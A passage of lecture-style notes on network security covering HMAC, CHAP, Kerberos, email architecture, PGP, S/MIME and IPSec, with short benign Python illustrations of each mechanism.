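
import hmac, hashlib

secret_key = b"shared secret known only to sender and receiver"
message = b"pay 500 to vendor 17"

# Class 2 (MAC): a function of the message AND a secret key.
tag = hmac.new(secret_key, message, hashlib.sha256).hexdigest()

# Class 3 (hash function): no key -- anyone can recompute it.
digest = hashlib.sha256(message).hexdigest()

# The receiver, who shares the key, recomputes the MAC and compares.
expected = hmac.new(secret_key, message, hashlib.sha256).hexdigest()
print(hmac.compare_digest(tag, expected))    # True -> message authentic and intact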
Authentication applications:
Authentication keeps invalid users out of databases, networks, and other resources. These
types of authentication use factors, a category of credential for verification, to confirm user
identity. Here are just a few authentication methods.
Single sign-on (SSO). With SSO, users only have to log in to one application and, in doing so, gain access to many other applications. This method is more convenient for users, as it removes the obligation to retain multiple sets of credentials and creates a more seamless experience during operative sessions.
Organizations can accomplish this by identifying a central domain (most ideally, an
IAM system) and then creating secure SSO links between resources. This process
allows domain-monitored user authentication and, with single sign-off, can ensure
that when valid users end their session, they successfully log out of all linked
resources and applications.
Password Authentication Protocol (PAP). While common, PAP is the least secure protocol for validating users, due mostly to its lack of encryption. It is essentially a routine login process that requires a username and password combination to access a given system, which validates the provided credentials. It is now most often used as a last option when communicating between a server and a desktop or remote device.
Challenge-Handshake Authentication Protocol (CHAP). CHAP is an identity verification protocol that verifies a user to a given network with a higher standard of encryption using a three-way exchange of a “secret.” First, the local router sends
a “challenge” to the remote host, which then sends a response with an MD5 hash function.
The router matches against its expected response (hash value), and depending on whether the
router determines a match, it establishes an authenticated connection—the “handshake”—or
denies access. It is inherently more secure than PAP, as the router can send a challenge at any
point during a session, and PAP only operates on the initial authentication approval.
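A rough sketch of the CHAP exchange just described, assuming both sides already share the secret out of band; the response function mimics RFC 1994 CHAP, which hashes the identifier, the secret, and the challenge with MD5.

import hashlib, os

shared_secret = b"out-of-band shared secret"

def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    # CHAP response = MD5(identifier || secret || challenge)
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

# 1. The authenticator (local router) sends a random challenge.
identifier, challenge = 1, os.urandom(16)

# 2. The remote host answers with the MD5 hash of id + secret + challenge.
response = chap_response(identifier, shared_secret, challenge)

# 3. The authenticator computes its own expected value and compares.
expected = chap_response(identifier, shared_secret, challenge)
print("handshake established" if response == expected else "access denied")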
Extensible Authentication Protocol (EAP). This protocol supports many types of authentication, from one-time passwords to smart cards. When used for wireless communications, EAP provides the highest level of security, as it allows a given access point and remote device to perform mutual authentication with built-in encryption. It connects users to the access point that requests credentials, confirms identity
via an authentication server, and then makes another request for an additional form of user
identification to again confirm via the server—completing the process with all messages
transmitted, encrypted.
Kerberos:
It is a network authentication protocol that uses third-party authorization for validating user
profiles. It also employs symmetric key cryptography for plain-text encryption and cipher-
text decryption. The keys in cryptography consist of a secret key that shares confidential
information between two or more objects.
In short, it helps in maintaining the privacy of an organization. Now that you know what Kerberos is, consider why it is used: there are various authorization protocols, but Kerberos is an improved version of them all, and it is genuinely difficult for cybercriminals to break into a Kerberos authentication system. Kerberos helps an organization manage weaknesses in its authentication process and defend itself from cybercriminals. It is used by popular operating systems such as Windows, UNIX, Linux, etc. With the use of the Kerberos authentication system, the internet has become a more secure place.
Parameters of Kerberos:
There are three main parameters that are used in Kerberos. They are:
1. Client
2. Server
3. Key Distribution Center (KDC)
It uses cryptography for maintaining mutual privacy by preventing the loss of packets while
transferring over the network.
Nowadays, Kerberos is used in every industry for maintaining a secure system to prevent
cybercrimes. The authentication protocols of it depend on regular auditing and various
authentication features. The two major goals of Kerberos are security and authentication.
Kerberos is used in email delivery systems, text messages, NFS, signaling, POSIX
authentication, and much more. It is also used in various networking protocols, such as
SMTP, POP, HTTP, etc. Further, it is used in client or server applications and in the
components of different operating systems to make them secure.
Kerberos working:
In the previous sections, we discussed that Kerberos is an authentication protocol. It has proved to be one of the essential components of client/server applications, and it is used in various fields for network security and providing mutual authentication. In this section, we will discuss how Kerberos works. For that, we first need to know about Kerberos's components.
Components of Kerberos:
Authentication service
Ticket-granting service
For providing these services, Kerberos uses its various components. Further, let us discuss the
following principal components that are used for authentication:
1. Client
The client helps to initiate a service request for communicating with the user.
2. Server
All the services that are required by the user are hosted by the server.
3. Key Distribution Center (KDC)
The KDC consists of three parts, which reside in a single unit: the Database, the Authentication Server (AS), and the Ticket Granting Server (TGS).
Authentication Server (AS)
As the name suggests, the AS is used for the authentication of the client and the server. The AS assigns a Ticket Granting Ticket (TGT) to the client. The assigned ticket ensures the authentication of the client to other servers.
Ticket Granting Server (TGS)
This server provides a service to assign tickets to the user as a unique key for authentication.
There are unique keys that are used by the authentication server and the TGS for both clients and servers. Now, let us look at the cryptographic secret keys that are used for authentication:
Client or User Secret Key: It is the hash of the password set by the user that acts as the client or user secret key.
TGS Secret Key: It is the secret key used by (and identifying) the TGS.
Server Secret Key: It identifies the server that provides the services.
Architecture of Kerberos:
The following steps are involved in the Kerberos workflow:
Step 1: Initially, there is an authentication request from the client. The user requests TGS
from the authentication server.
Step 2: After the client’s request, the client data is validated by the KDC. The authentication
server verifies the client and the TGS from the database. The authentication server then
generates a cryptographic key (SK1) after checking both values and implementing the hash of
the password. The authentication server also computes a session key. This session key uses
the secret key of the client (SK2) for encryption.
Step 3: The authentication server then creates a ticket that consists of the ID, network
address, secret key, and lifetime of the client.
Step 4: The decryption of the message is then performed by the client by using the client’s
secret key.
Step 5: Now, the client demands entrance into the server by using TGS. The TGS creates a
ticket that acts as an authenticator here.
Step 6: Another ticket is generated by KDC for the file server. Then, the TGS decrypts the
ticket for obtaining the secret key initiated by the client. It checks the network address and ID
by decrypting the authenticator. If the client ID and the network address match successfully,
then KDC shares a service key with the client and the server.
Step 7: The client utilizes the file ticket for authentication. The message is decrypted by
using SK1 to obtain SK2. Again, the TGS generates a new ticket to send to the target server.
Step 8: Here, the target server decrypts the file ticket by using the secret key. After that, the
server performs checks on the client details by decrypting SK2. The target server also checks
the validity of the ticket. Finally, when all of the client’s encrypted data is decrypted and
verified, the server authenticates the client to use the services.
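A heavily simplified sketch of steps 1-4 above (the AS exchange only), assuming the third-party cryptography package; the client secret key is derived from the password hash as described earlier, and Fernet merely stands in for the symmetric encryption that Kerberos performs with its own algorithms. All names here are illustrative.

import base64, hashlib, json, time
from cryptography.fernet import Fernet

def key_from_password(password: str) -> bytes:
    # Client/user secret key = hash of the user's password
    return base64.urlsafe_b64encode(hashlib.sha256(password.encode()).digest())

# --- Key Distribution Center side --------------------------------------
users = {"alice": key_from_password("alice-password")}    # KDC database
tgs_key = Fernet.generate_key()                           # TGS secret key

def as_exchange(username: str):
    client_key = users[username]                          # looked up, never sent
    session_key = Fernet.generate_key()                   # SK for client <-> TGS
    # Ticket Granting Ticket: readable only by the TGS
    tgt = Fernet(tgs_key).encrypt(json.dumps(
        {"user": username, "session_key": session_key.decode(),
         "issued": time.time(), "lifetime": 3600}).encode())
    # The session key travels encrypted under the client's secret key
    reply = Fernet(client_key).encrypt(session_key)
    return reply, tgt

# --- Client side --------------------------------------------------------
reply, tgt = as_exchange("alice")
client_key = key_from_password("alice-password")          # derived locally
session_key = Fernet(client_key).decrypt(reply)           # step 4: decrypt the reply
print("client obtained session key:", session_key.decode()[:10] + "...")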
Kerberos Limitations:
Each network service must be modified individually for use with Kerberos
It doesn’t work well in a timeshare environment
Requires a secured Kerberos server
Requires an always-on Kerberos server
All user passwords are stored encrypted with a single master key
Assumes workstations are secure
May result in cascading loss of trust.
Scalability
Benefits of Kerberos:
1. Enhanced security
Authorization from third parties, multiple secret keys, and cryptography make Kerberos one
of the most reliable authentication protocols in the industry. When using Kerberos, user passwords are never sent across the network in the clear; only encrypted messages and tickets derived from hidden secret keys move between devices. This makes it extremely difficult to collect enough data to impersonate a client or service, even if someone is recording the conversation.
2. Access control
Access control is a key part of modern business, and the protocol enables effective access control. With the help of this protocol, a business gets a single point for enforcing safety protocols and keeping login records.
3. Auditability
Transparent and accurate logs are important for auditing processes and inquiries. Kerberos clarifies who requested what, and at what moment, which helps maintain transparency.
4. Shared authentication
It allows users and service systems to authenticate each other. Users and server systems can
understand that they are communicating with valid partners at each stage of the
authentication process.
5. Limited-lifetime ticket
In the Kerberos model, all tickets have serial numbers and lifetime data, so admins can monitor how long users remain authorized. Short ticket lifetimes help prevent brute-force and replay attacks.
6. Scalability
Several tech companies, including Apple, Microsoft, and Sun, have implemented the
Kerberos authentication system. This level of acceptance speaks volumes about the capability
of Kerberos to keep up with the needs of large companies.
7. Reusable authentications
The authentication of Kerberos is reusable and robust. Users need to verify devices with
Kerberos only once. They can verify network services for the lifespan of the ticket without
having to re-enter personal information.
E-mail:
Email stands for Electronic Mail. It is a method of sending messages from one computer to another computer through the internet. It is mostly used in business, education, technical communication, and document interactions. It allows communicating with people all over the world without interrupting them, since they can read messages at their convenience. In 1971, Ray Tomlinson sent a test email containing text to himself.
Email is information sent electronically between two or more people over a network. It involves a sender and one or more receivers.
History of Email:
The history of email is older than ARPANET and the Internet: the earliest electronic mail could only be exchanged between users of the same computer. Networked email services started in 1971, when Ray Tomlinson developed a system to send mail between users on different hosts across the ARPANET, using the @ sign to separate the user name from the destination host; this came to be recognized as email.
Uses of Email:
Email services are used in various sectors and organizations, either personally or among a large group of people. Email provides an easy way to communicate with individuals or groups by sending and receiving documents, images, links, and other files. It also provides the flexibility of communicating with others on their own schedule.
Large or small companies can use email services to reach many employees and customers. A company can send emails to many employees at a time, which makes it a professional way to communicate. A newsletter service is also used to send company advertisements, promotions, and other subscribed content to users.
Types of Email
Newsletters
It is a type of email sent by an individual or a company to its subscribers. It contains advertisements, product promotions, updates regarding the organization, and marketing content. It might announce upcoming events, seminars, or webinars from the organization.
Onboarding emails
It is an email a user receives right after subscription. These emails are sent to buyers to familiarize them with the product and show them how to use it. It may also contain details about the journey in the new organization.
Transactional
These types of emails might contain invoices for recent transactions and details about those transactions. If a transaction fails, they include details about when the amount will be refunded. We can say that transactional emails are confirmations of purchase.
Plain-Text Emails
These types of emails contain just simple text similar to other text message services.
It does not include images, videos, documents, graphics, or any attachments. Plain-
text emails are also used for casual chatting, like other text message services.
Advantages of Email Services
These are the following advantages of email services:
Easy and Fast:
Composing an email is very simple, and it is one of the fastest ways to communicate. We can send an email within a minute just by clicking the mouse. It has minimal lag time, so messages can be exchanged quickly.
Secure:
Email services are a secure and reliable method to receive and send information. The spam-filtering feature provides additional security because a user can easily eliminate malicious content.
Mass Sending:
We can easily send a message to many people at a time through email. Suppose a company wants to send holiday information to all employees; using email, this can be done easily. The mail merge feature in MS Word provides further options to send messages to many people by substituting the relevant information for each recipient.
Multimedia Email:
Email allows sending multimedia: documents, images, audio files, videos, and various other types of files. We can easily attach these files in their original format or in a compressed format.
Disadvantages of Email Services
Malicious Use:
Anyone can send an email just by knowing the recipient's email address, so an anonymous or unauthorized person can send mail to a user. The attachment feature of email can be a major disadvantage: hackers can send viruses through email, because sometimes the spam filter is unable to classify suspicious emails.
Spam:
Email services keep improving spam filtering, but it is still imperfect; sometimes an important email is moved into the spam folder without any notification.
Time Consuming:
Responding through email takes more time than other messaging services like WhatsApp, Telegram, etc. Email is good for professional discussion but not good for casual chatting.
Email Architecture:
Electronic mail, commonly known as email, is a method of exchanging messages over the
internet. Here are the basics of email:
1. An email address: This is a unique identifier for each user, typically in the format username@domain.com.
2. An email client: This is a software program used to send, receive and manage emails,
such as Gmail, Outlook, or Apple Mail.
3. An email server: This is a computer system responsible for storing and forwarding
emails to their intended recipients.
To send an email:
1. Mailbox: It is a file on the local hard drive that collects mails. Delivered mails are placed in this file, and the user can read or delete them as required. To use the e-mail system, each user must have a mailbox, and access to the mailbox is restricted to its owner.
2. Spool file: This file contains mails that are waiting to be sent. The user agent appends outgoing mails to this file using SMTP, and the MTA extracts pending mail from the spool file for delivery. E-mail also allows one name, an alias, to represent several different e-mail addresses; this is known as a mailing list. Whenever a user sends a message, the system checks the recipient's name against the alias database. If a mailing list is present for the given alias, a separate message is prepared for each entry in the list and handed to the MTA. If no mailing list exists for the alias, the name itself becomes the destination address and a single message is delivered to the mail transfer entity. (A minimal sketch of handing a message to an SMTP server for delivery appears below.)
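A minimal sketch of a user agent handing a finished message to an SMTP server (the MTA) for delivery, using Python's standard smtplib and email modules; the server name, port, addresses, and credentials are placeholders, and most real servers also require STARTTLS and authentication, as shown.

import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "sender@example.com"
msg["To"] = "recipient@example.com"
msg["Subject"] = "Test message"
msg.set_content("Hello, this message was handed to the MTA over SMTP.")

# Hand the composed message to the mail transfer agent for delivery.
with smtplib.SMTP("smtp.example.com", 587) as server:
    server.starttls()                                     # upgrade to an encrypted channel
    server.login("sender@example.com", "app-password")    # placeholder credentials
    server.send_message(msg)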
Services provided by E-mail system :
Composition – Composition refers to the process of creating messages and replies. Any kind of text editor can be used for composition.
Transfer – Transfer means the sending procedure of mail, i.e., from the sender to the recipient.
Reporting – Reporting refers to confirmation of the delivery of mail. It helps the user check whether their mail was delivered, lost, or rejected.
Displaying – It refers to presenting mail in a form that the user can understand.
Disposition – This step concerns what the recipient does after receiving the mail, i.e., save it, delete it before reading, or delete it after reading.
PGP (Pretty Good Privacy):
PGP provides a confidentiality and authentication service that can be used for electronic mail and file storage applications. In essence, the developer of PGP did the following:
• Selected the best available cryptographic algorithms as building blocks.
• Integrated these algorithms into a general-purpose application that is independent of operating system and processor and that is based on a small set of easy-to-use commands.
• Made the package and its documentation, including the source code, freely available via the internet, bulletin boards and commercial networks.
• Entered into an agreement with a company to provide a fully compatible, low-cost commercial version of PGP.
PGP has grown explosively and is now widely used. A number of reasons can be cited for this growth. It is available free worldwide in versions that run on a variety of platforms. It is based on algorithms that have survived extensive public review and are considered extremely secure (e.g., RSA, DSS and Diffie-Hellman for public-key encryption). It has a wide range of applicability. It was not developed by, nor is it controlled by, any governmental or standards organization.
Operational description The actual operation of PGP consists of five services:
1. Authentication
2. Confidentiality
3. Compression
4. E-mail compatibility
5. Segmentation.
1. Authentication: The sequence for authentication is as follows:
• The sender creates the message.
• SHA-1 is used to generate a 160-bit hash code of the message.
• The hash code is encrypted with RSA using the sender's private key, and the result is prepended to the message.
• The receiver uses RSA with the sender's public key to decrypt and recover the hash code.
• The receiver generates a new hash code for the message and compares it with the decrypted hash code. If the two match, the message is accepted as authentic.
2. Confidentiality: The sequence for confidentiality is as follows:
• The sender generates a message and a random 128-bit number to be used as a session key for this message only.
• The message is encrypted using CAST-128 with the session key.
• The session key is encrypted with RSA, using the receiver's public key, and is prepended to the message.
• The receiver uses RSA with its private key to decrypt and recover the session key.
• The session key is used to decrypt the message.
Confidentiality and authentication: Both services may be used for the same message. First, a signature is generated for the plaintext message and prepended to the message. Then the plaintext plus the signature is encrypted using CAST-128, and the session key is encrypted using RSA.
3. Compression: As a default, PGP compresses the message after applying the signature but before encryption. This has the benefit of saving space both for e-mail transmission and for file storage. The signature is generated before compression for two reasons:
• It is preferable to sign an uncompressed message so that one can store only the uncompressed message together with the signature for future verification. If one signed a compressed document, then it would be necessary either to store a compressed version of the message for later verification or to recompress the message when verification is required.
• PGP's compression algorithm is not deterministic: different implementations may produce different compressed output for the same input, so applying the hash and signature after compression would constrain all implementations to exactly the same version of the compression algorithm.
4. E-mail compatibility: Many e-mail systems only permit the use of ASCII text. Since PGP produces a raw 8-bit binary stream (partly ciphertext), it converts this stream to printable ASCII characters using radix-64 (base64) conversion, which expands the message by about 33%.
5. Segmentation and reassembly: E-mail facilities are often restricted to a maximum message length. For example, many of the facilities accessible through the internet impose a maximum length of 50,000 octets. Any message longer than that must be broken up into smaller segments, each of which is mailed separately. To accommodate this restriction, PGP automatically subdivides a message that is too large into segments that are small enough to send via e-mail. The segmentation is done after all the other processing, including the radix-64 conversion. At the receiving end, PGP must strip off all e-mail headers and reassemble the entire original block before performing the other steps.
A means of generating unpredictable session keys is needed. It must allow a user to have
multiple public key/private key pairs.
Each PGP entity must maintain a file of its own public/private key pairs as well as a file of
public keys of correspondent.
a. Session key generation: Each session key is associated with a single message and is used only for the purpose of encryption and decryption of that message. Random 128-bit numbers are generated using CAST-128 itself. The input to the random number generator consists of a 128-bit key and two 64-bit blocks that are treated as plaintext to be encrypted. Using cipher feedback mode, CAST-128 produces two 64-bit ciphertext blocks, which are concatenated to form the 128-bit session key. The plaintext input to CAST-128 is itself derived from a stream of randomized 128-bit numbers. These numbers are based on keystroke input from the user.
b. Key identifiers: If multiple public/private key pairs are used, how does the recipient know which of the public keys was used to encrypt the session key? One simple solution would be to transmit the public key with the message, but this is unnecessarily wasteful of space. Another solution would be to associate an identifier with each public key that is unique at least within each user. The solution adopted by PGP is to assign a key ID to each public key that is, with very high probability, unique within a user ID. The key ID associated with each public key consists of its least significant 64 bits; i.e., the key ID of public key KUa is (KUa mod 2^64).
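A one-line illustration of that rule, the least significant 64 bits of the public key treated as an integer (the key value here is an arbitrary toy number):

public_key_int = 0x9A3F5C7E12B4D6F8A1C3E5079B2D4F6811223344   # toy public key value
key_id = public_key_int % (1 << 64)                            # KUa mod 2^64
print(hex(key_id))                                             # 0x9b2d4f6811223344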
Notation: Ks = session key used in symmetric encryption; KRa = private key of user A; KUa = public key of user A; EP/DP = public-key encryption/decryption; EC/DC = symmetric encryption/decryption; H = hash function; || = concatenation; Z = compression; R64 = conversion to radix-64 ASCII format.
PGP message generation First consider message transmission and assume that the
message is to be both signed and encrypted. The sending PGP entity performs the
following steps
1. Signing the message
• PGP retrieves the sender's private key from the private key ring using user ID as an index. If user ID was not provided, the first private key from the ring is retrieved.
• PGP prompts the user for the passphrase (password) to recover the unencrypted
private key.
• The signature component of the message is constructed.
2. Encrypting the message
• PGP generates a session key and encrypts the message.
• PGP retrieves the recipient's public key from the public key ring using user ID as index.
The receiving PGP entity performs the following steps:
• PGP retrieves the receiver's private key from the private key ring, using the key ID field in the session key component of the message as an index.
• PGP prompts the user for the passphrase (password) to recover the
unencrypted private key.
• PGP then recovers the session key and decrypts the message.
• PGP retrieves the sender's public key from the public key ring, using the key ID field in the signature key component of the message as an index.
• PGP recovers the transmitted message digest.
• PGP computes the message digest for the received message and compares it to
the transmitted message digest to authenticate.
S/MIME:
S/MIME (Secure/Multipurpose Internet Mail Extension) is a security enhancement to the
MIME Internet e-mail format standard, based on technology from RSA Data Security.
MIME is an extension to the RFC 822 framework that is intended to address some of the problems
and limitations of the use of SMTP (Simple Mail Transfer Protocol) or some other mail transfer
protocol and RFC 822 for electronic mail.
SMTP and RFC 822 have a number of limitations: for example, SMTP cannot transmit binary objects or 8-bit national-language text, servers may reject messages over a certain size, and gateways to EBCDIC or X.400 systems can mangle or lose data. (The full list of limitations is given below in the subsection Multipurpose Internet Mail Extensions.) MIME is intended to resolve these problems in a manner that is compatible with existing RFC 822 implementations. The specification is provided in RFCs 2045 through 2049.
OVERVIEW
1. Five new message header fields are defined, which may be included in an RFC 822 header.
These fields provide information about the body of the message.
2. A number of content formats are defined, thus standardizing representations that support
multimedia electronic mail.
3. Transfer encodings are defined that enable the conversion of any content format into a
form that is protected from alteration by the mail system. In this subsection, we introduce the
five message header fields.
The next two subsections deal with content formats and transfer encodings. The five header fields are:
• MIME-Version: Must have the parameter value 1.0. This field indicates that the message conforms to RFCs 2045 and 2046.
• Content-Type: Describes the data contained in the body with sufficient detail that the receiving user agent can pick an appropriate mechanism to present the data to the user or otherwise handle it.
• Content-Transfer-Encoding: Indicates the type of transformation that has been used to represent the body of the message in a way that is acceptable for mail transport.
• Content-ID: Used to identify MIME entities uniquely in multiple contexts.
• Content-Description: A text description of the object within the body; this is useful when the object is not readable (e.g., audio data).
MIME Content Types: There are seven different major types of content and a total of 15 subtypes.
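The header fields just listed can be seen on an actual multipart message built with Python's standard email package; the addresses and attachment bytes below are placeholders.

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication

msg = MIMEMultipart()        # Content-Type: multipart/mixed; MIME-Version: 1.0 is added automatically
msg["From"] = "sender@example.com"
msg["To"] = "recipient@example.com"
msg["Subject"] = "Report attached"

# A text part (Content-Type: text/plain) ...
msg.attach(MIMEText("Please find the report attached.", "plain"))

# ... and a binary part; base64 transfer encoding protects it in transit.
part = MIMEApplication(b"%PDF-1.4 fake bytes", _subtype="pdf")
part["Content-Description"] = "Quarterly report"
part.add_header("Content-Disposition", "attachment", filename="report.pdf")
msg.attach(part)

print(msg.as_string()[:400])   # shows the MIME headers and the start of the body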
Multipurpose Internet Mail Extensions:
Multipurpose Internet Mail Extension (MIME) is an extension to the RFC 5322 framework
that is intended to address some of the problems and limitations of the use of Simple Mail
Transfer Protocol (SMTP), defined in RFC 821, or some other mail transfer protocol and
RFC 5322 for electronic mail.
1. SMTP cannot transmit executable files or other binary objects. A number of schemes are in
use for converting binary files into a text form that can be used by SMTP mail systems,
including the popular UNIX UUencode/ UUdecode scheme. However, none of these is a
standard or even a de facto standard.
2. SMTP cannot transmit text data that includes national language characters, because these are represented by 8-bit codes with values of 128 decimal or higher, and SMTP is limited to 7-bit ASCII.
3. SMTP servers may reject mail messages over a certain size.
4. SMTP gateways that translate between ASCII and the character code EBCDIC do not use
a consistent set of mappings, resulting in translation problems.
5. SMTP gateways to X.400 electronic mail networks cannot handle nontextual data included
in X.400 messages.
6. Some SMTP implementations do not adhere completely to the SMTP standards defined in
RFC 821.
S/MIME provides the following functions:
• Enveloped data: This consists of encrypted content of any type and encrypted content-encryption keys for one or more recipients.
• Signed data: A digital signature is formed by taking the message digest of the content to be
signed and then encrypting that with the private key of the signer. The content plus signature
are then encoded using base64 encoding. A signed data message can only be viewed by a
recipient with S/MIME capability.
• Clear-signed data: As with signed data, a digital signature of the content is formed.
However, in this case, only the digital signature is encoded using base64. As a result,
recipients without S/MIME capability can view the message content, although they cannot
verify the signature.
• Signed and enveloped data: Signed-only and encrypted-only entities may be nested, so that
encrypted data may be signed and signed data or clear-signed data may be encrypted.
Cryptographic Algorithms
S/MIME uses the following terminology, taken from RFC 2119, to specify the requirement level for each cryptographic algorithm:
• MUST: The definition is an absolute requirement of the specification. An implementation must include this feature or function to conform to the specification.
• SHOULD: There may exist valid reasons in particular circumstances to ignore this feature or function, but it is recommended that an implementation include the feature or function.
• Secure mailing lists: When a user sends a message to multiple recipients, a certain amount
of per-recipient processing is required, including the use of each recipient’s public key. The
user can be relieved of this work by employing the services of an S/MIME Mail List Agent
(MLA). An MLA can take a single incoming message, perform the recipient-specific
encryption for each recipient, and forward the message. The originator of a message need
only send the message to the MLA with encryption performed using the MLA’s public key.
IP SECURITY:
OVERVIEW OF IPSEC
IPSec (Internet Protocol Security) is an Internet Engineering Task Force (IETF) standard suite of protocols, operating between two communication points across an IP network, that provides data authentication, integrity, and confidentiality. It also defines how packets are encrypted, decrypted, and authenticated, and it specifies the protocols needed for secure key exchange and key management.
Applications of IPSec:
IPSec provides the capability to secure communications across a LAN, across private and
public WANs, and across the Internet.
Components of IP Security:
1. Encapsulating Security Payload (ESP)
2. Authentication Header (AH)
3. Internet Key Exchange (IKE)
1. Encapsulating Security Payload (ESP): It provides data integrity, encryption,
authentication, and anti-replay. It also provides authentication for payload.
2. Authentication Header (AH): It also provides data integrity, authentication, and anti-replay, but it does not provide encryption. The anti-replay protection protects against the unauthorized retransmission of packets. It does not protect data confidentiality.
3. Internet Key Exchange (IKE): IKE is the protocol used to set up Security Associations (SAs) between the two endpoints and to negotiate and exchange the cryptographic keys used by AH and ESP.
IP Security Architecture
IPSec (IP Security) architecture uses two protocols to secure the traffic or data flow. These
protocols are ESP (Encapsulation Security Payload) and AH (Authentication Header).
IPSec Architecture includes protocols, algorithms, DOI, and Key Management. All these
components are very important in order to provide the three main services:
Confidentiality
Authenticity
Integrity
Working of IP Security
The host checks if the packet should be transmitted using IPsec or not. This packet
traffic triggers the security policy for itself. This is done when the system sending the
packet applies appropriate encryption. The incoming packets are also checked by the
host that they are encrypted properly or not.
Then IKE Phase 1 starts, in which the two hosts (using IPsec) authenticate themselves to each other to start a secure channel. It has two modes: Main mode, which provides greater security, and Aggressive mode, which enables the hosts to establish an IPsec circuit more quickly.
The channel created in the last step is then used to securely negotiate the way the IP
circuit will encrypt data across the IP circuit.
Now, the IKE Phase 2 is conducted over the secure channel in which the two hosts
negotiate the type of cryptographic algorithms to use on the session and agree on secret
keying material to be used with those algorithms.
Then the data is exchanged across the newly created IPsec encrypted tunnel. These
packets are encrypted and decrypted by the hosts using IPsec SAs.
When the communication between the hosts is completed or the session times out then
the IPsec tunnel is terminated by discarding the keys by both hosts.
Features of IPSec
1. Authentication: IPSec provides authentication of IP packets using digital signatures or
shared secrets. This helps ensure that the packets are not tampered with or forged.
2. Confidentiality: IPSec provides confidentiality by encrypting IP packets, preventing
eavesdropping on the network traffic.
3. Integrity: IPSec provides integrity by ensuring that IP packets have not been modified
or corrupted during transmission.
4. Key management: IPSec provides key management services, including key exchange
and key revocation, to ensure that cryptographic keys are securely managed.
5. Tunneling: IPSec supports tunneling, allowing IP packets to be encapsulated within
another protocol, such as GRE (Generic Routing Encapsulation) or L2TP (Layer 2
Tunneling Protocol).
6. Flexibility: IPSec can be configured to provide security for a wide range of network
topologies, including point-to-point, site-to-site, and remote access connections.
7. Interoperability: IPSec is an open standard protocol, which means that it is supported
by a wide range of vendors and can be used in heterogeneous environments.
Advantages of IPSec
1. Strong security: IPSec provides strong cryptographic security services that help protect
sensitive data and ensure network privacy and integrity.
2. Wide compatibility: IPSec is an open standard protocol that is widely supported by
vendors and can be used in heterogeneous environments.
3. Flexibility: IPSec can be configured to provide security for a wide range of network
topologies, including point-to-point, site-to-site, and remote access connections.
4. Scalability: IPSec can be used to secure large-scale networks and can be scaled up or
down as needed.
5. Improved network performance: IPSec can help improve network performance by
reducing network congestion and improving network efficiency.
Disadvantages of IPSec
1. Configuration complexity: IPSec can be complex to configure and requires specialized
knowledge and skills.
2. Compatibility issues: IPSec can have compatibility issues with some network devices
and applications, which can lead to interoperability problems.
3. Performance impact: IPSec can impact network performance due to the overhead of
encryption and decryption of IP packets.
4. Key management: IPSec requires effective key management to ensure the security of
the cryptographic keys used for encryption and authentication.
5. Limited protection: IPSec secures only the IP traffic covered by its security policy; attacks against higher-level services (for example, DNS abuse) or against protocols and paths outside the protected tunnels remain possible.
Encapsulating Security Payload (ESP)
• In transport mode, ESP protects the transport-layer payload; this includes higher-level protocols and ports (NATs and firewalls may need this information).
• The ESP header is actually a header plus a trailer, since it “surrounds” the packet data.
• Services provided: confidentiality, connectionless integrity, and an anti-replay service.
• Fields include: SPI, Sequence Number, Padding length, and Next header (in tunnel mode the Next header value would be set to 4, indicating an encapsulated IP packet).
Authentication Header (AH)
• Service provided: connectionless integrity (no confidentiality).
• Payload Length: length (in 32-bit words) of the AH header minus 2 (note that it is actually the AH header length, not the payload length).
• Authentication Data: the integrity check value (ICV), computed over most of the packet. Mutable IP header fields such as TOS, flags, fragment offset, TTL, and header checksum are excluded from the calculation (note: the packet-length field is covered at its modified value).
• Tunnel mode vs. transport mode is identified by the next header type in the IPSec header (this is also true of ESP).
• Because AH covers the source address, a change of (private) source address, for example at a NAT box, does not allow re-computation of the HMAC by the destination.
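The following is a minimal Python sketch, using the third-party cryptography package, of the services listed above for ESP: confidentiality and connectionless integrity from an AEAD cipher, plus a sequence number that supports anti-replay. The field layout, SPI value, and key handling are illustrative assumptions, not the real ESP wire format.

```python
# Minimal sketch of the services ESP provides: confidentiality and integrity
# via an AEAD cipher, plus a sequence number for anti-replay. This is NOT the
# real ESP packet format; field names, sizes, and values are illustrative only.
import os
import struct
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)
aead = AESGCM(key)
spi = 0x1001          # identifies the security association (made-up value)
seq = 1               # anti-replay sequence number

def esp_like_protect(payload: bytes) -> bytes:
    nonce = os.urandom(12)
    header = struct.pack("!II", spi, seq)              # "ESP header": SPI + sequence number
    ciphertext = aead.encrypt(nonce, payload, header)  # header authenticated, payload encrypted
    return header + nonce + ciphertext

def esp_like_unprotect(packet: bytes) -> bytes:
    header, nonce, ciphertext = packet[:8], packet[8:20], packet[20:]
    return aead.decrypt(nonce, ciphertext, header)     # raises an error if tampered with

protected = esp_like_protect(b"inner IP packet bytes")
print(esp_like_unprotect(protected))
```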
Security Associations:
An IPSec-protected connection is called a security association (SA); SAs and their processing are specified in RFC 4301.
• The SPI used in identifying the SA is normally chosen by the receiving system (destination).
• Basic processing:
– For outbound packets, a packet’s selector is used to determine the processing to be applied to the packet. This is more complex than for inbound packets, where the received SPI, destination address, and protocol type uniquely point to an SA.
• Selectors used to match traffic to an SA include the destination IP address, the source IP address, and a name (a user or system identifier).
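As a rough illustration of this processing model, the sketch below models an outbound policy lookup keyed by a packet's selector and an inbound SA lookup keyed by (SPI, destination, protocol). All addresses, SPIs, and table contents are made-up examples.

```python
# Toy sketch of IPSec selector matching: an outbound policy table maps a
# packet's selector (source, destination, protocol) to an SA identified by an
# SPI; inbound lookup is simpler, keyed by (SPI, destination, protocol).
from typing import NamedTuple, Optional

class Selector(NamedTuple):
    src: str
    dst: str
    proto: str

# Outbound: the packet's selector decides which SA (and processing) applies.
spd = {
    Selector("10.0.0.5", "192.168.1.9", "tcp"): {"spi": 0x2001, "mode": "tunnel", "protocol": "ESP"},
    Selector("10.0.0.5", "192.168.1.9", "udp"): {"spi": 0x2002, "mode": "transport", "protocol": "AH"},
}

def lookup_outbound_sa(packet_selector: Selector) -> Optional[dict]:
    return spd.get(packet_selector)

# Inbound: the received SPI, destination address, and protocol uniquely
# identify the SA that holds the keys and algorithms to apply.
sad = {(0x2001, "192.168.1.9", "ESP"): "SA #1 keys and algorithms"}

print(lookup_outbound_sa(Selector("10.0.0.5", "192.168.1.9", "tcp")))
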